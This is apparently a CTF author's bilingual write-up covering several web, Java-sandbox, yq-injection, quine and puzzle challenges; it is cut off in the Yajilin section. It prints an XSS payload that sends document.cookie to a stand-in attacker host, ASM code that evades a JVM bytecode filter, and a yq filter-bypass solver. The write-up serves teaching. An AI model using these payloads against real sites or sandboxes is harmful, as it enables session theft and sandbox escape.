    name = request.args.get("name") or story["default_name"]
    name = sanitize_text(name.strip())
    content = story["content"].replace("[name]", "[name] ")
    sanitized = sanitize_text(content)
    linkified = linkify_text(sanitized)
    rendered = linkified.replace("[name]", name)
    return render_template(
        "read.html",
        title=escape(story["title"]),
        name=escape(name),
        story=Markup(rendered),
    )

If the body contains a string like https://example.com/?q=[name], linkify generates <a href="https://example.com/?q=[name]">...</a>. Since [name] appears inside href, attribute injection becomes possible after the replacement.

By setting a value like "onfocus=fetch('https://attacker/?'+document.cookie) autofocus= as default_name, the result becomes <a href="https://example.com/?q="onfocus=fetch('https://attacker/?'+document.cookie) autofocus=">...</a>, breaking out of href and injecting onfocus and autofocus. This causes fetch to execute automatically on page load, sending the Cookie to the attacker. However, default_name has a 20-character limit, so the payload cannot be inserted directly.

Also, since a space is inserted after [name], placing [name] in the middle of a URL to leverage the subsequent characters for attribute injection is not possible either.

On the other hand, the name parameter in /read/<id>?name=... has no length limit. So, we first use an injection that fits within the default_name length to clickjack when the bot clicks the name input field. For example, setting "style=padding:9%; expands the click area of the URL, allowing the bot to be redirected to an arbitrary URL when it clicks on input[name='name'].

By setting the redirect destination to /read/<id>?name=<payload>, we can make the bot navigate to a page with an arbitrary name. Setting name to something like "onfocus=fetch('https://attacker/?'+document.cookie) autofocus= breaks out of href and injects onfocus and autofocus, causing fetch to execute automatically on page load.

To make the bot access /read, the URL must be specified as http://dream-of-you:5000, but this is not recognized as a URL by linkify, so a redirect via something like https://redirectmeto.com/http://dream-of-you:5000 is needed.

This allows us to obtain the Reader Bot's flag cookie.

There were several unintended solutions, such as one using " 'x=' and another using [name<img/>]. This reminded me how difficult it is to patch unintended solutions in web challenges...

misc

javajail (55 solves)

問題

渡したクラスファイルを読み込み、run() を実行してくれるサービスです。/flag.txtにあるフラグを読むことがゴールですが、以下の制約があります。

クラスサイズは 650 バイト以下
クラス内に Runtime という ASCII 文字列が含まれていてはいけない
invokestatic / invokevirtual / invokespecial / invokeinterface / invokedynamicを含んでいてはいけない

解法

フィルターがなければ run 関数内で System.out.println(Files.readString(new File("/flag.txt").toPath())); を呼ぶようなコードをコンパイルして渡せばよいです。しかし、JVM ではreadStringやprintlnといったメソッド呼び出しはバイトコード上では invokestatic 命令や invokevirtual 命令としてコンパイルされるため、run() 内でメソッドを呼ぶこと自体が不可能に見えます。

これを回避するため、 ConstantDynamic を使います。これは ldc 命令で定数をロードするときに、ConstantBootstraps を介して任意の処理を実行し、その結果を定数として返せる仕組みです。つまり、 run() 内では ldc 命令を実行するだけでメソッド呼び出し相当の処理を発生させることができます。

この方法でSystem.out.println(Files.readString(new File("/flag.txt").toPath()));を実行するクラスファイルを生成するコードは、例えば以下のようになります。

クラスファイルの生成コード（クリックで展開）

import jdk.internal.org.objectweb.asm.*;
import static jdk.internal.org.objectweb.asm.Opcodes.*;
import java.util.Base64;
 
public class Gen {
    public static void main(String[] args) throws Exception {
        ClassWriter cw = new ClassWriter(0);
        cw.visit(V17, ACC_PUBLIC, "X", null, "java/lang/Object", null);
 
        MethodVisitor mv = cw.visitMethod(ACC_PUBLIC | ACC_STATIC, "run", "()V", null, null);
        mv.visitCode();
 
        Handle bsmInvoke = new Handle(
            H_INVOKESTATIC,
            "java/lang/invoke/ConstantBootstraps",
            "invoke",
            "(Ljava/lang/invoke/MethodHandles$Lookup;Ljava/lang/String;Ljava/lang/Class;Ljava/lang/invoke/MethodHandle;[Ljava/lang/Object;)Ljava/lang/Object;",
            false
        );
 
        Handle bsmGetStaticFinal = new Handle(
            H_INVOKESTATIC,
            "java/lang/invoke/ConstantBootstraps",
            "getStaticFinal",
            "(Ljava/lang/invoke/MethodHandles$Lookup;Ljava/lang/String;Ljava/lang/Class;Ljava/lang/Class;)Ljava/lang/Object;",
            false
        );
        ConstantDynamic file = new ConstantDynamic(
            "_",
            "Ljava/io/File;",
            bsmInvoke,
            new Handle(H_NEWINVOKESPECIAL, "java/io/File", "<init>", "(Ljava/lang/String;)V", false),
            "/flag.txt"
        );
        ConstantDynamic path = new ConstantDynamic(
            "_",
            "Ljava/nio/file/Path;",
            bsmInvoke,
            new Handle(H_INVOKEVIRTUAL, "java/io/File", "toPath", "()Ljava/nio/file/Path;", false),
            file
        );
        ConstantDynamic str = new ConstantDynamic(
            "_",
            "Ljava/lang/String;",
            bsmInvoke,
            new Handle(H_INVOKESTATIC, "java/nio/file/Files", "readString", "(Ljava/nio/file/Path;)Ljava/lang/String;", false),
            path
        );
        ConstantDynamic out = new ConstantDynamic(
            "_",
            "Ljava/io/PrintStream;",
            bsmGetStaticFinal,
            new Object[]{ Type.getType("Ljava/lang/System;") }
        );
        ConstantDynamic print = new ConstantDynamic(
            "_",
            "Ljava/lang/Object;",
            bsmInvoke,
            new Object[]{
                new Handle(H_INVOKEVIRTUAL, "java/io/PrintStream", "println", "(Ljava/lang/String;)V", false),
                out,
                str
            }
        );
        mv.visitLdcInsn(print);
        mv.visitInsn(POP);
        mv.visitInsn(RETURN);
        mv.visitMaxs(1, 0);
        mv.visitEnd();
 
        cw.visitEnd();
        byte[] bytesOut = cw.toByteArray();
        System.out.println(Base64.getEncoder().encodeToString(bytesOut));
    }
}

これを実行してみると、クラスファイルは 979 バイトとなり、残念ながら1つ目の条件である「クラスサイズは 650 バイト以下」を満たしません。この方法では ConstantDynamic を5つ使っていることが主なバイトサイズ増加の原因となっており、更に短いチェインで同様の処理を実行する方法を考える必要があります。

いくつか方法はあると思いますが、 new FileInputStream("flag.txt").transferTo(System.out) という呼び出しが想定解となります。この形であれば、 ConstantDynamic を 3 つに抑えられます。以下のようにしてクラスファイルを生成できます。

クラスファイルの生成コード（クリックで展開）

import jdk.internal.org.objectweb.asm.*;
import static jdk.internal.org.objectweb.asm.Opcodes.*;
import java.util.Base64;
 
public class Gen {
    public static void main(String[] args) throws Exception {
        ClassWriter cw = new ClassWriter(0);
        cw.visit(V17, ACC_PUBLIC, "X", null, "java/lang/Object", null);
 
        MethodVisitor mv = cw.visitMethod(ACC_PUBLIC | ACC_STATIC, "run", "()V", null, null);
        mv.visitCode();
 
        Handle bsm = new Handle(
            H_INVOKESTATIC,
            "java/lang/invoke/ConstantBootstraps",
            "invoke",
            "(Ljava/lang/invoke/MethodHandles$Lookup;Ljava/lang/String;Ljava/lang/Class;Ljava/lang/invoke/MethodHandle;[Ljava/lang/Object;)Ljava/lang/Object;",
            false
        );
        ConstantDynamic fis = new ConstantDynamic(
            "out",
            "Ljava/io/FileInputStream;",
            bsm,
            new Handle(H_NEWINVOKESPECIAL, "java/io/FileInputStream", "<init>", "(Ljava/lang/String;)V", false),
            "/flag.txt"
        );
        ConstantDynamic sysOut = new ConstantDynamic(
            "out",
            "Ljava/io/PrintStream;",
            bsm,
            new Handle(H_GETSTATIC, "java/lang/System", "out", "Ljava/io/PrintStream;", false)
        );
        ConstantDynamic transferred = new ConstantDynamic(
            "out",
            "J",
            bsm,
            new Handle(H_INVOKEVIRTUAL, "java/io/FileInputStream", "transferTo", "(Ljava/io/OutputStream;)J", false),
            fis,
            sysOut
        );
        mv.visitLdcInsn(transferred);
        mv.visitInsn(POP2);
        mv.visitInsn(RETURN);
 
        mv.visitMaxs(2, 0);
        mv.visitEnd();
 
        cw.visitEnd();
        byte[] classBytes = cw.toByteArray();
        System.out.println(Base64.getEncoder().encodeToString(classBytes));
    }
}

バイト数は 634 バイトとなり、条件を満たすことができます。更に、クラスファイル内で参照される同じ文字列定数を使い回すなどの最適化により、617バイトまで削減できることを確認しています。更に削減できたら教えてください。

misc

javajail (55 solves)

Challenge

A service that loads the class file you provide and executes run(). The goal is to read the flag at /flag.txt, subject to the following constraints:

Class size must be 650 bytes or less
The class must not contain the ASCII string Runtime
The class must not contain invokestatic / invokevirtual / invokespecial / invokeinterface / invokedynamic

Solution

Without the filters, you could compile code that calls System.out.println(Files.readString(new File("/flag.txt").toPath())); inside run and submit it. However, in the JVM, method calls like readString and println are compiled to invokestatic or invokevirtual bytecode instructions, making calling any method inside run() seemingly impossible.

To work around this, we use ConstantDynamic. This is a mechanism that allows executing arbitrary processing via ConstantBootstraps when loading a constant with the ldc instruction, and returning the result as a constant. In other words, by executing an ldc instruction inside run(), we can trigger method-call-equivalent processing.

Code that generates a class file executing System.out.println(Files.readString(new File("/flag.txt").toPath())); this way could look like:

Class file generation code (click to expand)

import jdk.internal.org.objectweb.asm.*;
import static jdk.internal.org.objectweb.asm.Opcodes.*;
import java.util.Base64;
 
public class Gen {
    public static void main(String[] args) throws Exception {
        ClassWriter cw = new ClassWriter(0);
        cw.visit(V17, ACC_PUBLIC, "X", null, "java/lang/Object", null);
 
        MethodVisitor mv = cw.visitMethod(ACC_PUBLIC | ACC_STATIC, "run", "()V", null, null);
        mv.visitCode();
 
        Handle bsmInvoke = new Handle(
            H_INVOKESTATIC,
            "java/lang/invoke/ConstantBootstraps",
            "invoke",
            "(Ljava/lang/invoke/MethodHandles$Lookup;Ljava/lang/String;Ljava/lang/Class;Ljava/lang/invoke/MethodHandle;[Ljava/lang/Object;)Ljava/lang/Object;",
            false
        );
 
        Handle bsmGetStaticFinal = new Handle(
            H_INVOKESTATIC,
            "java/lang/invoke/ConstantBootstraps",
            "getStaticFinal",
            "(Ljava/lang/invoke/MethodHandles$Lookup;Ljava/lang/String;Ljava/lang/Class;Ljava/lang/Class;)Ljava/lang/Object;",
            false
        );
        ConstantDynamic file = new ConstantDynamic(
            "_",
            "Ljava/io/File;",
            bsmInvoke,
            new Handle(H_NEWINVOKESPECIAL, "java/io/File", "<init>", "(Ljava/lang/String;)V", false),
            "/flag.txt"
        );
        ConstantDynamic path = new ConstantDynamic(
            "_",
            "Ljava/nio/file/Path;",
            bsmInvoke,
            new Handle(H_INVOKEVIRTUAL, "java/io/File", "toPath", "()Ljava/nio/file/Path;", false),
            file
        );
        ConstantDynamic str = new ConstantDynamic(
            "_",
            "Ljava/lang/String;",
            bsmInvoke,
            new Handle(H_INVOKESTATIC, "java/nio/file/Files", "readString", "(Ljava/nio/file/Path;)Ljava/lang/String;", false),
            path
        );
        ConstantDynamic out = new ConstantDynamic(
            "_",
            "Ljava/io/PrintStream;",
            bsmGetStaticFinal,
            new Object[]{ Type.getType("Ljava/lang/System;") }
        );
        ConstantDynamic print = new ConstantDynamic(
            "_",
            "Ljava/lang/Object;",
            bsmInvoke,
            new Object[]{
                new Handle(H_INVOKEVIRTUAL, "java/io/PrintStream", "println", "(Ljava/lang/String;)V", false),
                out,
                str
            }
        );
        mv.visitLdcInsn(print);
        mv.visitInsn(POP);
        mv.visitInsn(RETURN);
        mv.visitMaxs(1, 0);
        mv.visitEnd();
 
        cw.visitEnd();
        byte[] bytesOut = cw.toByteArray();
        System.out.println(Base64.getEncoder().encodeToString(bytesOut));
    }
}

Running this produces a 979-byte class file, which unfortunately does not satisfy the first condition of "class size must be 650 bytes or less." In this approach, using 5 ConstantDynamic instances is the main cause of the size increase, so we need to find a way to perform equivalent processing with a shorter chain.

There are several approaches, but the intended solution is the call new FileInputStream("flag.txt").transferTo(System.out). This form allows us to reduce the number of ConstantDynamic instances to 3. The class file can be generated as follows.

Class file generation code (click to expand)

import jdk.internal.org.objectweb.asm.*;
import static jdk.internal.org.objectweb.asm.Opcodes.*;
import java.util.Base64;
 
public class Gen {
    public static void main(String[] args) throws Exception {
        ClassWriter cw = new ClassWriter(0);
        cw.visit(V17, ACC_PUBLIC, "X", null, "java/lang/Object", null);
 
        MethodVisitor mv = cw.visitMethod(ACC_PUBLIC | ACC_STATIC, "run", "()V", null, null);
        mv.visitCode();
 
        Handle bsm = new Handle(
            H_INVOKESTATIC,
            "java/lang/invoke/ConstantBootstraps",
            "invoke",
            "(Ljava/lang/invoke/MethodHandles$Lookup;Ljava/lang/String;Ljava/lang/Class;Ljava/lang/invoke/MethodHandle;[Ljava/lang/Object;)Ljava/lang/Object;",
            false
        );
        ConstantDynamic fis = new ConstantDynamic(
            "out",
            "Ljava/io/FileInputStream;",
            bsm,
            new Handle(H_NEWINVOKESPECIAL, "java/io/FileInputStream", "<init>", "(Ljava/lang/String;)V", false),
            "/flag.txt"
        );
        ConstantDynamic sysOut = new ConstantDynamic(
            "out",
            "Ljava/io/PrintStream;",
            bsm,
            new Handle(H_GETSTATIC, "java/lang/System", "out", "Ljava/io/PrintStream;", false)
        );
        ConstantDynamic transferred = new ConstantDynamic(
            "out",
            "J",
            bsm,
            new Handle(H_INVOKEVIRTUAL, "java/io/FileInputStream", "transferTo", "(Ljava/io/OutputStream;)J", false),
            fis,
            sysOut
        );
        mv.visitLdcInsn(transferred);
        mv.visitInsn(POP2);
        mv.visitInsn(RETURN);
 
        mv.visitMaxs(2, 0);
        mv.visitEnd();
 
        cw.visitEnd();
        byte[] classBytes = cw.toByteArray();
        System.out.println(Base64.getEncoder().encodeToString(classBytes));
    }
}

The byte count is 634 bytes, satisfying the constraint. Furthermore, by optimizations such as reusing the same string constants referenced in the class file, we have confirmed it can be reduced to 617 bytes. If you can reduce it further, please let me know.

misc

Yet Another Injection Challenge (27 solves)

問題

入力した文字列がそのまま yq -n <expr> に渡され、成功すれば ok、失敗すれば error が返ってきます。さらに入力に " / . / env / load / file が含まれると弾かれます。

解法

yq は YAML/JSON を扱うコマンドです。-n が指定されているため、ファイルからの入力はなく、<expr> の式を評価した結果が出力されます。式の評価に失敗した場合は error が出力されます。

フィルターがなければload_str("/flag.txt")のようにしてフラグを読み取り、error based oracleのようにして内容を復元することができますが、"やloadが禁止されているため直接的な方法は取れません。しかし、yq には eval 関数が存在するため、文字列として組み立てた任意の式を実行できます。これを使うためにload_str("/flag.txt")を文字列として組み立てる必要があります。

任意の一文字の文字列を構成することができれば、それらを結合することによって任意の文字列を作ることができます。 yqのドキュメントを読むと、@uridと@uriを使って文字列をURIエンコード/デコードできることがわかります。これを利用すると、%,1-9,a-fの17種類の文字を作ることができれば、それらを %XX の形に結合して @urid をかけることで任意の文字を作ることができます。

%は1|tag|@uri|split(2)|first(0)で構成できます（1|tag|@uriで"%21%21int"となり、これを"2"でsplitして["%", "1%", "1int"]、最初の要素を取得して"%"）。

1-9は1|to_stringのようにして簡単に構成できます。a-fは%と1-6を使って"%61"|@uridのようにして構成できます。

これで任意の文字列が構成できるようになりました。あとはeval内でload_str("/flag.txt")を実行して一文字ずつ特定すればよいです。文字の特定には、load_str("/flag.txt")/""|.[i]<"c" or error(0)のような式を使うことができます。a/""|.[i]でaのi文字目を取得し、短絡評価により<"c"がfalseに評価された場合にのみerror(0)が呼び出されます。

ソルバは以下の通りです。最初に各文字を構成し、as構文を使って後から参照しています。

ソルバ（クリックで展開）

from pwn import *
 
chars = [
    "1|tag|@uri|split(2)|first(0) as $p",
    *[f"{i}|to_string as ${i}" for i in range(10)],
    *[f"$p+{c:02x}|to_string|@urid as ${chr(c)}" for c in b"abcdef"],
]
 
sc = remote("localhost", 9999)
 
def oracle(payload):
    payload = "+".join(f"$p+${c//16:x}+${c%16:x}" for c in payload.encode())
    payload = f"{"|".join(chars)}|eval({payload}|@urid)".encode()
    sc.sendlineafter(b": ", payload)
    return "ok" in sc.recvuntil(b"expr").decode()
 
flag = ""
for i in range(100):
    if not oracle(f"""load_str("/flag.txt")|length>{i} or error(0)"""):
        break
    l = 0x20
    r = 0x80
    while r - l > 1:
        m = (l + r) // 2
        res = oracle(f"""load_str("/flag.txt")/""|.[{i}]<"{chr(m)}" or error(0)""")
        if res:
            r = m
        else:
            l = m
    flag += chr(l)
print(flag)

misc

Yet Another Injection Challenge (27 solves)

Challenge

The string you input is passed directly to yq -n <expr>, and ok is returned on success or error on failure. Additionally, inputs containing " / . / env / load / file are rejected.

Solution

yq is a command for handling YAML/JSON. Since -n is specified, there is no input from a file; the expression <expr> is evaluated and its result is output. If evaluation fails, error is output.

Without the filters, you could read the flag with something like load_str("/flag.txt") and recover the content using an error-based oracle. However, since " and load are banned, direct approaches are not possible. Fortunately, yq has an eval function that allows executing an arbitrary expression built as a string. To use this, we need to construct the string load_str("/flag.txt").

If we can construct any single character as a string, we can concatenate them to build any string. Reading the yq documentation, we find that @urid and @uri can be used to URI-encode/decode strings. Using this, if we can construct the 17 characters %, 1-9, a-f, we can concatenate them in the form %XX and apply @urid to produce any character.

% can be constructed with 1|tag|@uri|split(2)|first(0) (since 1|tag|@uri yields "%21%21int", splitting by "2" gives ["%", "1%", "1int"], and taking the first element gives "%").

1-9 can easily be constructed as 1|to_string, etc. a-f can be constructed using % and 1-6 as "%61"|@urid, etc.

Now we can construct any string. Next, execute load_str("/flag.txt") inside eval and identify the flag one character at a time. To identify characters, we can use an expression like load_str("/flag.txt")/""|.[i]<"c" or error(0). a/""|.[i] gets the i-th character of a, and due to short-circuit evaluation, error(0) is called only when <"c" evaluates to false.

The solver is as follows. It first constructs each character, then references them later using the as syntax.

Solver (click to expand)

from pwn import *
 
chars = [
    "1|tag|@uri|split(2)|first(0) as $p",
    *[f"{i}|to_string as ${i}" for i in range(10)],
    *[f"$p+{c:02x}|to_string|@urid as ${chr(c)}" for c in b"abcdef"],
]
 
sc = remote("localhost", 9999)
 
def oracle(payload):
    payload = "+".join(f"$p+${c//16:x}+${c%16:x}" for c in payload.encode())
    payload = f"{"|".join(chars)}|eval({payload}|@urid)".encode()
    sc.sendlineafter(b": ", payload)
    return "ok" in sc.recvuntil(b"expr").decode()
 
flag = ""
for i in range(100):
    if not oracle(f"""load_str("/flag.txt")|length>{i} or error(0)"""):
        break
    l = 0x20
    r = 0x80
    while r - l > 1:
        m = (l + r) // 2
        res = oracle(f"""load_str("/flag.txt")/""|.[{i}]<"{chr(m)}" or error(0)""")
        if res:
            r = m
        else:
            l = m
    flag += chr(l)
print(flag)

misc

Fault Tolerance Py (8 solves)

問題

与えたプログラムから 1 文字だけ削除したコードが、削除位置を変えながら何度も実行されます。どの削除でもエラーなく終了し、出力が元のプログラム全文と一致しなければなりません。条件を満たすとフラグが出力されます。

解法

ifやforなどのキーワードを用いる構文や、()や[]などの括弧を用いる構文は基本的に使うことができませんが、以下のような3段階のアプローチで解決します。

どうにかして任意の名前の変数を宣言する
どうにかして文字列を構成する
どうにかしてexecする

それぞれいくつか方法はありますが、1,2については例えば以下のような方法で確実にprint(1)の部分を含む文字列をxxxという変数に代入することができます。 xxx=xxx=xxx=rf="""" ";print(1)#"""##""" 文字列に限らず特定の変数名がNameErrorにならないようにするためであれば、以下のような方法もあります。 xxx:11=22;;xxx:11=22;

次に、この文字列xxxをexecする方法について考えます。先述の通りexec(xxx)のような構文は括弧が消えた場合に壊れてしまうため、括弧を使わずに関数を呼び出す方法を考える必要があります。

help.__class__.__lt__ = execを実行すると、以降でxxx > helpが実行されたときにexec(xxx)が呼び出されるようになります。これを利用します。

さて、execしたい文字列リテラル内で破壊が起こった場合も考慮する必要があります。そこで、 AAA,BBB,CCCのすべてにexecしたい文字列を入れておきます。破壊されるのは一箇所のみであることから、このうち2つ以上の文字列は正しく残ることになります。以下のような処理を実行すると、必ずどれかの比較演算子によって正しい文字列でexecが呼び出されることがわかります。比較演算子をチェインすると前の比較がTrueになった場合のみ後続の比較が実行されることを利用しています。複数回実行されることを避けるため、execされる処理内でexit(0)を呼び出すと良いです。

AAA==BBB>help;
AAA==CCC>help;
BBB>help;

これで任意のコードが実行できるようになりました。後は通常のQuineと同様の方法を使うことによってフラグを得ることができます。

似た問題としてIERAE CTF 2025 の Fault Tolerance が存在します。問題設定は同様ですが、今回はJSではなくPythonで放射線耐性Quineを書いてくださいという問題です。この問題はIERAE CTF 2025の開催より前から作問ストックにあったのですが、先にIERAE CTFで出されてしまいました。私が調べた限りではPythonで放射線耐性Quineを達成した例は見つかりませんでしたが、実はcodegolf.stackexchange.comにPythonでの解答例が投稿されていたようでした。

misc

Fault Tolerance Py (8 solves)

Challenge

The program you submit is repeatedly executed with one character deleted at a time, varying the deletion position. For every possible deletion, the code must terminate without error and the output must match the full original program text. If the conditions are met, the flag is output.

Solution

Syntax constructs using keywords like if or for, and constructs using brackets like () or [], are basically unusable. However, the following three-step approach solves the challenge.

Somehow declare a variable with an arbitrary name
Somehow construct a string
Somehow execute exec

There are several approaches for each, but for steps 1 and 2, the following method reliably assigns a string containing print(1) to the variable xxx:

xxx=xxx=xxx=rf="""" ";print(1)#"""##"""

To prevent a specific variable name from causing a NameError (not limited to strings), the following approach also works:

xxx:11=22;;xxx:11=22;

Next, consider how to exec this string xxx. As mentioned above, syntax like exec(xxx) breaks if the parentheses are deleted, so we need a way to call a function without parentheses.

By executing help.__class__.__lt__ = exec, subsequent executions of xxx > help will call exec(xxx). We use this approach.

We also need to handle the case where the string literal to be exec-ed is destroyed. So we store the string to be exec-ed in all of AAA, BBB, and CCC. Since only one position is deleted, at least two of these strings will remain intact. The following processing guarantees that exec is called with a correct string by one of the comparison operators. This relies on the fact that in chained comparisons, subsequent comparisons are only evaluated if the preceding comparison is True. To avoid multiple executions, calling exit(0) inside the exec-ed code is recommended.

AAA==BBB>help;
AAA==CCC>help;
BBB>help;

Now arbitrary code can be executed. From here, the flag can be obtained using the same method as a standard Quine.

A similar challenge is Fault Tolerance from IERAE CTF 2025. The challenge setup is the same, but this is a Python radiation-hardened Quine challenge rather than JS. This challenge was in my challenge stockpile before IERAE CTF 2025 was held, but it was released there first. As far as I could find, there were no examples of achieving a radiation-hardened Quine in Python, but it turns out there was an answer posted on codegolf.stackexchange.com for Python.

rev & misc

Yajirin

問題

ヤジリンというペンパズルの URL が1つ配布されます。また、README にフラグの計算方法が記載されています。

解いた盤面の第1行を見る

左から順に黒マスを 1、非黒マスを 0 として連結したバイナリ文字列を作る

その文字列の SHA-256 ハッシュを計算する

フラグは tkbctf{<16進ハッシュ>} の形式

解法

URL のパース

配布された URL はそのままブラウザで開いたり、curlしても開けません。

puzz.link のヤジリンの URL 形式は yajilin/<cols>/<rows>/<data> という構造をしています。 pzprjsの実装を見ると、<data> 部分のエンコーディング規則は以下のようになっています。

0〜4 の後に続く1文字：矢印付きマス（方向 + 数字）
5〜9 の後に続く2文字：矢印付きマス（数字が大きい場合）
+：黒マス
a〜z：空マスのスキップ（a = 1マス飛ばし、z = 26マス飛ばし）

これに従ってデコードすると、cols x rows のグリッドとして解釈できます。

グリッドの構造発見

グリッドを可視化すると、横方向に複数の「レーン」が並んだ構造になっていることがわかります。

可視化した盤面

構造を観察していくと、上下の往復が434回あり、その内最初の16回のみ上部が他と異なった構造を持っていることが確認できます。更に、17往復目以降、斜めに以下の二種類のパターンが現れています。

^0    ^0 ^0 ^0 ^0 ^0
^0    ^0 ^0 ^0 ^0 ^0
^0          ^0 ^0 ^0
^0          ^0 ^0 ^0
^0    <1    ^0 ^0 ^0
^0                <0
^0                ^0
^0       v1       ^0
^0    <1 v1    ^0 ^0
^0             ^0 ^0
>0                ^0
^0          v0    ^0
^0 ^2 v0 <0 v0    ^0
^0 v0 v0 <0 v0    ^0
^0                ^0
^0          v0 v0 ^0
^0       v0 v0 v0 ^0
^0       v0 v0 v0 ^0

v0 ^0 ^0    ^0 ^0 ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0    ^0 ^0 ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0    ^0 ^0 ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0          ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0          ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0    <1    ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0                <0 ^0 ^0
v0 ^0 >1                   v1 ^0
v0 ^0 ^0       v1             ^0
v0 ^0 ^0    <1 v1    ^0       ^0
v0 ^0 ^0             ^0       ^0
v0 ^0 >0                      ^0
v0 ^0 ^0          <1 v0 <1    ^0
v0 ^0 ^0 ^2 <0 <0 v0 v0 <0    ^0
v0 ^0 ^0 ^2          v0       ^0
v0                            <2
v0             <0 v0 v0 v0 v0 ^0
v0       v0 v0 v0 v0 v0 v0 v0 ^0
v0             v0 v0 v0 v0 v0 ^0
v0             v0 v0 v0 v0 v0 ^0
v0 ^0 ^1       v0 v0 v0 v0 v0 ^0
v0 ^0 ^1       v0 v0 v0 v0 v0 ^0

また、これらのパターンの左には必ず以下のようなパターンが2つ存在しています。

v0 ^0 ^0       v0 v0
v0 ^0 ^0       v0 v0
v0 ^0          v0 v0
v0             v0 v0
v0       v0 v0 v0 v0
v0       v0 v0 v0 v0
v0             <0 v0
v0             v0 v0
v0 ^0 ^1       v0 v0
v0 ^0 ^1       v0 v0

このパターンの組み合わせによって全体が構成されているようです。2つのパターンそれぞれについて最小の構成を抜き出すと、以下のようになります。

https://puzz.link/p?yajilin/b/24/24/20e2020e20e1010101010f20f20a2...

https://puzz.link/p?yajilin/b/26/27/20e2020e20e10101010101010f20f...

それぞれ解を列挙してみると、最上行の二箇所（2,9列目）の黒マスの有無が00,01,10,11の4種類あり、 1つ目のパターンではそれらが11の組み合わせの場合に、2つ目のパターンではそれらが10または01の組み合わせの場合に、右下の三マス出っ張った部分の一番上のマスが黒マスになっています。このことから、このパターンはそれぞれAND,XORのビット演算を構成しているとわかります。

経路の蛇行とビット表現

各レーンでは、経路が横に蛇行しながら下に向かって伸びています。この蛇行には入力ビットによって決まる以下のような2つの「位相」があります。

v[x]┏ ┓ ┏ ┓  |  v ┏ ┓ ┏ ━ ┓
┏ ━ ┛ ┗ ┛ ┃  |  ┏ ┛ ┗ ┛ ┏ ┛
┃ v ^ ^ ┏ ┛  |  ┃ v ^ ^ ┗ ┓
┃ v ^ ^ ┗ ┓  |  ┃ v ^ ^ ┏ ┛
┃ v ^ ^ ┏ ┛  |  ┃ v ^ ^ ┗ ┓
┃ v ^ ^ ┗ ┓  |  ┃ v ^ ^ ┏ ┛

入力ビットの0と1によって最上行付近の経路が変わり、下に続く部分で蛇行の位相がずれた状態で始まります。この位相は最下行まで保たれたまま伝播していきます。

読み出しガジェットとNOT演算

上述した読み出しガジェットはソースレーンの上に重ねて配置され、位相によって異なる位置が黒マスになるように構成されています。

v ^ ^ ┏ ┛ v v  |  v ^ ^ ┗ ┓ v v
v ^ ^ ┗ ┓ v v  |  v ^ ^ ┏ ┛ v v
v ^ ┏ ┓ ┃ v v  |  v ^[x]┗ ┓ v v
v ┏ ┛ ┗ ┛ v v  |  v ┏ ━ ━ ┛ v v
v ┃[x]v v v v  |  v ┗ ┓ v v v v
v ┗ ┓ v v v v  |  v ┏ ┛ v v v v
v ┏ ┛ ┏ ┓ < v  |  v ┃ ┏ ━ ┓ < v
v ┗ ━ ┛ ┃ v v  |  v ┗ ┛ ┏ ┛ v v
v ^ ^ ┏ ┛ v v  |  v ^ ^ ┗ ┓ v v
v ^ ^ ┗ ┓ v v  |  v ^ ^ ┏ ┛ v v

この黒マスがAND,XORのガジェットにある<1の先に置かれるかどうかによってゲートへの入力ビットが決まり、その組み合わせによってゲートのあるレーンの以降の位相が決まります。

上の図で[x]の位置を比較すると、左では5行目に、右では3行目に黒マスが来ており、この上寄り/下寄りの違いはビット値そのものではなく反転の有無に対応しています。

NOTは二通りの方法で表現されています。

読み出しガジェットの位置

ガジェット全体が2行だけ上にずれると、経路はそのままにAND/XORガジェットによって読み出される黒マスの行が3行目から5行目に変わります。これにより読み出される値が反転します。

AND/XORガジェットの配置行の偶奇

蛇行は2行周期なので、ガジェット全体を1行ずらすと位相が半周期ずれ、読み出しガジェットを通る経路が変わり、読み出される値が反転します。

盤面を解析する際はこの二つをそれぞれ読み取り、XORをとることでNOTフラグを復元できます。

最終的に評価される値は一番右のレーンの出力です。最後のレーンの最下行は以下のようになっており、これはレーンの出力が1の場合にのみ成立します。

^0 ^0       v0 v0 v0 ^0  |  ^ ^ ┗ ┓ v v v ^
>1          v0           |  > ┏ ┓ ┃ v ┏ ┓[x]
^0          v0           |  ^ ┃ ┗ ┛ v ┃ ┗ ┓
^0       v0 >0          -->  ^ ┗ ┓ v > ┃ ┏ ┛
^0 v0                v0  |  ^ v ┗ ━ ━ ┛ ┃ v
^0 v0 v0 v0 v0 v0    v0  |  ^ v v v v v ┃ v
                     v0  |  ━ ━ ━ ━ ━ ━ ┛ v

ここまでの解析により、盤面全体を回路としてパースすることができます。入力は16bitなので、2^16通りのすべての入力に対して出力を計算する、またはz3ソルバーなどを使って出力が1になる入力を計算することで1100000110110101という解が得られます。入力の各bitが最上行の $7x+2$ 列目に対応していることから、以下のようにしてフラグが計算できます。

bits = "1100000110110101"
width = 4548
val = bytearray(b"0"*width)
for i in range(16):
    val[i*7+1] = ord(bits[i])
print(f"tkbctf{{{hashlib.sha256(val).hexdigest()}}}")

Google CTFで毎年出題される論理回路問が好きなのでインスパイアです。この問題は人力で解いてもらう気はあんまりなく、うまくAIと協働してねという意図で作りました。 URLのパースなどはAIに任せて、人間は構造の把握に集中するのが良いと思います。

rev & misc

Yajirin

Challenge

One URL for a Yajilin pencil puzzle is distributed. The README also describes how the flag is calculated.

Look at the first row of the solved grid

Create a binary string by reading from left to right, using 1 for black cells and 0 for non-black cells

Compute the SHA-256 hash of that string

The flag is in the format tkbctf{<hex hash>}

Solution

Parsing the URL

The distributed URL cannot be opened directly in a browser or with curl.

The URL format for Yajilin on puzz.link is yajilin/<cols>/<rows>/<data>. Looking at the pzprjs implementation, the encoding rules for the <data> part are as follows:

A character 0-4 followed by one more character: arrow cell (direction + number)
A character 5-9 followed by two more characters: arrow cell (for larger numbers)
+: black cell
a-z: skip blank cells (a = skip 1 cell, z = skip 26 cells)

Following these rules and decoding gives a cols x rows grid.

Discovering the Grid Structure

Visualizing the grid reveals a structure with multiple "lanes" arranged horizontally.

Visualized board

Observing the structure, there are 434 up-down traversals, with only the first 16 having a distinct upper structure from the rest. From the 17th traversal onward, two types of patterns appear diagonally.

^0    ^0 ^0 ^0 ^0 ^0
